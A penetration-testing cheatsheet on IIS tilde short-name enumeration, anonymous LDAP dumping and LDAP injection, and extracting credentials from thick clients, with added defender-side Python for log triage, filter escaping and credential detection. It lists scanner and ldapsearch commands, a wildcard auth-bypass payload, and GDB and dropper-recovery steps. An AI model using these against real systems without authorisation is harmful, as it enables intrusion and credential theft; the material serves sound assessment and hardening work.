🛡️ Methodology Checklist
- IIS tilde enumeration: java -jar iis_shortname_scanner.jar 2 20 http://[TARGET]/ (confirm 8.3 filenames via the 404 vs 400 response difference)
- LDAP injection: test auth fields with *)(& payloads
- LDAP dump if injectable: extract user objects
- Thick client: capture traffic with Burp/Wireshark (set as proxy)
- Check for hardcoded credentials in thick client config files
- Decompile if .NET: dnSpy; if Java: JD-GUI
🎯 Operational Context
Use when: IIS web server identified, LDAP exposed, or thick client application being assessed — exploit IIS tilde enumeration, anonymous LDAP bind, or thick client traffic interception.
Think Dumber First: IIS tilde: curl http://[TARGET]/~1/ returns 404 if no short names, 400 if tilde enumeration works. Anonymous LDAP: ldapsearch -x -H ldap://[TARGET] -b '' -s base — if it works, enumerate everything. Thick client: route through Burp.
Skip when: IIS is 8.0+ with tilde fix applied (post-2012 patch).
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| java -jar iis_shortname_scanner.jar 0 5 http://[TARGET_IP]/ | IIS 8.3 tilde enumeration — find hidden file/dir prefixes |
| egrep -r ^[PREFIX] /usr/share/wordlists/* \| sed 's/^[^:]*://' > /tmp/filtered.txt | Build wordlist from discovered prefix |
| gobuster dir -u http://[TARGET_IP]/ -w /tmp/filtered.txt -x .aspx,.asp | Fuzz full filename from prefix |
| nmap -p 389,636,3268 -sC -sV --open [TARGET_IP] | Scan LDAP ports (389=cleartext, 636=LDAPS, 3268=AD GC) |
| ldapsearch -H ldap://[TARGET_IP] -x -b "dc=[DOMAIN],dc=com" "(mail=user@domain.com)" | LDAP anonymous bind enumeration |
| ldapsearch -H ldap://[TARGET_IP]:389 -x -b "dc=[DOMAIN],dc=com" "*" | Dump all LDAP objects (anon bind) |
| Username: * Password: * in login form | LDAP injection wildcard auth bypass |
| gdb ./[BINARY] → set disassembly-flavor intel → disas main → b *(main+[OFFSET]) → run → x/s $rdx | GDB breakpoint to catch ELF connection string in RDX |
| strings -e l [FILE].dll | Find UTF-16LE strings in .NET DLL |
| Get-ChildItem -Path C:\ -Filter "[FILE].dll" -Recurse -ErrorAction SilentlyContinue | Locate a target .NET DLL on disk (Windows) |
🔬 Deep Dive & Workflow
IIS Tilde (8.3) Enumeration
Affects: IIS 7.0 – 10.0 with 8.3 filenames enabled
Logic: Windows generates short names (SecretDocs → SECRET~1); IIS reveals whether a file exists based on a ~ prefix probe
Workflow:
1. java -jar iis_shortname_scanner.jar 0 5 http://[TARGET]/
→ Output: TRANSF~1.ASP → file starting "transf", extension .asp
2. Generate wordlist: egrep -r ^transf /usr/share/wordlists/ | sed 's/^[^:]*://' > list.txt
3. gobuster dir -u http://[TARGET]/ -w list.txt -x .asp,.aspx
Pitfalls:
- 403 after finding shortname = file exists, need full name
- Scanner hangs → edit config.xml: <acceptableDifferenceLengthBetweenResponses>-1</acceptableDifferenceLengthBetweenResponses>
- Always check both .asp and .aspx extensions
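Added here as a defender-side example (not code from the original cheatsheet): a small IIS log triage routine that flags clients probing "~<digit>" short-name paths and notes whether the server answered with the 400-vs-404 split the section relies on. The log field order and the sample lines are constructed for the example.

```python
import re
from collections import defaultdict

# Added defender-side example, not from the original page: scan IIS request
# logs for 8.3 short-name probing (URIs carrying a "~<digit>" segment) and
# report per-client counts. The field order is an assumption for this
# constructed sample: date time c-ip cs-method cs-uri-stem sc-status
SAMPLE_LOG = """\
2024-01-01 10:00:01 10.0.0.5 GET /index.aspx 200
2024-01-01 10:00:02 10.0.0.9 GET /a~1/ 404
2024-01-01 10:00:02 10.0.0.9 GET /b~1/ 404
2024-01-01 10:00:03 10.0.0.9 GET /s~1/ 400
2024-01-01 10:00:03 10.0.0.9 GET /se~1/ 400
2024-01-01 10:00:04 10.0.0.9 GET /sec~1/ 400
2024-01-01 10:00:05 10.0.0.5 GET /about.aspx 200
"""

TILDE_PROBE = re.compile(r"~\d")  # matches SECRET~1-style short-name segments


def parse_line(line):
    """Split one constructed log line into ip, uri and status; None if malformed."""
    parts = line.split()
    if len(parts) != 6:
        return None
    _date, _time, c_ip, _method, uri, status = parts
    if not status.isdigit():
        return None
    return {"ip": c_ip, "uri": uri, "status": int(status)}


def find_tilde_probing(log_text, min_requests=3):
    """Return {client_ip: summary} for clients with >= min_requests tilde probes.
    'differentiating' is True when one client got both 400 and 404 replies,
    the split the page treats as the sign that short-name enumeration works."""
    per_ip = defaultdict(lambda: {"probes": 0, "statuses": defaultdict(int)})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not TILDE_PROBE.search(rec["uri"]):
            continue
        per_ip[rec["ip"]]["probes"] += 1
        per_ip[rec["ip"]]["statuses"][rec["status"]] += 1
    result = {}
    for ip, data in per_ip.items():
        if data["probes"] < min_requests:
            continue
        statuses = dict(data["statuses"])
        result[ip] = {"probes": data["probes"], "statuses": statuses,
                      "differentiating": 400 in statuses and 404 in statuses}
    return result
```

A host that shows up as differentiating is the one to prioritise for the 8.3 fix in the Recommendation below; a client that only ever sees 404 is still worth a look as a scanner source.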
LDAP Enumeration & Injection
# Anonymous bind dump
ldapsearch -H ldap://[TARGET_IP] -x -b "dc=[DOMAIN],dc=com" "*"
# Targeted user search
ldapsearch -H ldap://[TARGET_IP] -x -b "dc=[DOMAIN],dc=com" "(sAMAccountName=[USER])"
# Authenticated bind
ldapsearch -H ldap://[TARGET_IP] -D "cn=[USER],dc=[DOMAIN],dc=com" -w [PASS] -b "dc=[DOMAIN],dc=com" "*"
Sensitive attributes to hunt: userPassword, description, notes — admins paste cleartext creds here.
LDAP injection auth bypass:
Login form: Username: * Password: *
Resulting query: (&(objectClass=user)(sAMAccountName=*)(userPassword=*))
→ Always true → bypasses auth
Injection chars: * (wildcard), ( ) (grouping), | (OR), & (AND), \ (escape)
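Added here as a defender-side example (not code from the original cheatsheet): the filter-building code that makes the wildcard bypass above possible, next to a hardened version that escapes every metacharacter the list names before splicing user input into the filter. The attribute names follow the page's example query; the function names are this example's own.

```python
# Added example, not from the original page: vulnerable vs hardened LDAP
# filter construction for the login query shown above.

def escape_filter_value(value: str) -> str:
    """Escape a value for use inside an LDAP search filter assertion.
    Uses the RFC 4515 hex-escape form; backslash goes first so the
    escapes it introduces are not escaped a second time."""
    out = value.replace("\\", "\\5c")
    out = out.replace("*", "\\2a")
    out = out.replace("(", "\\28")
    out = out.replace(")", "\\29")
    out = out.replace("\x00", "\\00")
    return out


def build_login_filter_unsafe(username: str, password: str) -> str:
    """Vulnerable form: raw string formatting, so '*' stays a wildcard and
    '(' ')' '|' '&' let the caller restructure the filter."""
    return (f"(&(objectClass=user)(sAMAccountName={username})"
            f"(userPassword={password}))")


def build_login_filter_safe(username: str, password: str) -> str:
    """Hardened form: every metacharacter in the input is neutralised.
    Note: comparing a password inside a search filter is itself a weak
    design; the stronger fix is to look up the DN and then bind with
    the supplied password so the directory does the check."""
    return (f"(&(objectClass=user)(sAMAccountName={escape_filter_value(username)})"
            f"(userPassword={escape_filter_value(password)}))")


def filter_has_bare_wildcard(ldap_filter: str) -> bool:
    """Quick review check: a literal '*' left in the assembled filter means
    user input reached the directory unescaped."""
    return "*" in ldap_filter
```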
Thick Client Credential Extraction
ELF Binary (Linux) — GDB breakpoint method:
gdb ./target_binary
gdb-peda$ set disassembly-flavor intel
gdb-peda$ disas main
# Find: call <SQLDriverConnect@plt> or similar connect function
gdb-peda$ b *(main+433) # decimal offset to the call
gdb-peda$ run
gdb-peda$ x/s $rdx # RDX = 3rd arg (connection string in Linux x64 calling convention)
# Output: "DRIVER={...};UID=sa;PWD=N0tS3cr3t!;"
- PIE binaries: use b *(main+OFFSET) rather than a raw address, which changes
- Linux x64 calling convention: RDI (1st), RSI (2nd), RDX (3rd)
- Stack-built strings: movabs instructions → must break at the call to see the assembled string
.NET DLL (Windows) — dnSpy static analysis:
1. strings -e l target.dll (UTF-16LE for .NET)
2. Open in dnSpy → navigate Controllers → find connection string variable
3. Look for: connectionString, Password=, PWD=
ProcMon dropper capture (Windows):
1. ProcMon64 → filter: Process Name = [APP.EXE]
2. Watch for CreateFile in AppData\Local\Temp
3. Lock Temp folder: Security → disable Delete + Delete Subfolders → apply
4. Re-run app → .bat file stays
5. Remove "del" lines from .bat → run manually → decode Base64 → get binary
6. x64dbg → Options: keep only Exit Breakpoint → open binary → F9 → Memory Map
→ find RW- section ~3000 bytes → Dump Memory → drag through de4dot → open in dnSpy
Decode a captured Base64 dropper back into the binary (PowerShell):
$salida = $null; $fichero = (Get-Content [BASE64_TXT_PATH]); foreach ($linea in $fichero) { $salida += $linea }; $salida = $salida.Replace(" ",""); [System.IO.File]::WriteAllBytes("[OUTPUT_EXE_PATH]", [System.Convert]::FromBase64String($salida))
Concatenates the captured Base64 lines, strips spaces, and writes the decoded bytes to an .exe — the manual step after pulling the .bat dropper out of %TEMP%.
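Added here as a defender-side example (not code from the original cheatsheet): a checker for the "connectionString, Password=, PWD=" hunt in the .NET section, run over config text or strings output, that reports which lines embed credentials and produces a redacted copy for the report. The sample text and the regular expression are this example's own assumptions about the key=value; connection-string shape.

```python
import re

# Added defender-side example, not from the original page: find connection
# strings that embed credentials in text such as a thick-client config file
# or `strings` output, and redact them for reporting. Sample is constructed.
SAMPLE_TEXT = """\
<add name="Main" connectionString="DRIVER={SQL Server};SERVER=db01;UID=sa;PWD=N0tS3cr3t!;" />
log_level=debug
Server=db02;Database=app;Integrated Security=True;
"""

# A run of two or more key=value; pairs; keys may contain spaces (Integrated Security)
CONN_STRING = re.compile(r"(?:[A-Za-z][A-Za-z ]*=[^;\"']*;){2,}")
SECRET_KEYS = {"pwd", "password"}


def parse_connection_string(conn):
    """Split 'k=v;k=v;' into a dict with lower-cased keys."""
    pairs = {}
    for part in conn.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            pairs[key.strip().lower()] = value.strip()
    return pairs


def find_embedded_credentials(text):
    """Return [(line_no, secret_keys)] for connection strings carrying a secret."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for match in CONN_STRING.finditer(line):
            pairs = parse_connection_string(match.group(0))
            secret_keys = sorted(k for k in pairs if k in SECRET_KEYS)
            if secret_keys:
                findings.append((line_no, secret_keys))
    return findings


def redact(text):
    """Replace the value of any PWD=/Password= pair so the text is safe to quote."""
    return re.sub(r"(?i)\b(pwd|password)=[^;\"']*", r"\1=[REDACTED]", text)
```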
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| IIS tilde returns 404 for all | Tilde fixed or feature disabled | Confirm IIS version first; fix was patched in 2012; try on old IIS installs |
| LDAP anonymous bind fails | Anonymous bind disabled | Expected hardened config; pivot to authenticated LDAP with any domain creds |
| Thick client traffic not in Burp | Not using system proxy | Configure thick client proxy settings; or use Proxifier/ProcMon to force traffic through Burp |
| LDAP dump too large | Full domain enumeration | Filter: ldapsearch -x ... '(objectClass=user)' sAMAccountName mail for specific attributes |
| IIS enumerated paths return 404 | Short name found but file removed | Short names of deleted files may still enumerate; focus on existing enumerated paths |
📝 Reporting Trigger
Finding Title: IIS Tilde Enumeration Exposes Hidden Files and Directory Structure
Impact: IIS 8.3 filename enumeration reveals short names of files and directories not accessible through normal browsing, exposing backup files, configuration files, and hidden directories that enable further exploitation.
Root Cause: IIS configured to allow 8.3 short filename generation. Short names are enumerable via HTTP without authentication through the IIS tilde vulnerability.
Recommendation: Disable 8.3 filename generation on IIS server volumes (fsutil 8dot3name). Apply Microsoft patch for IIS tilde vulnerability. Enumerate and verify no sensitive files are accessible via discovered paths.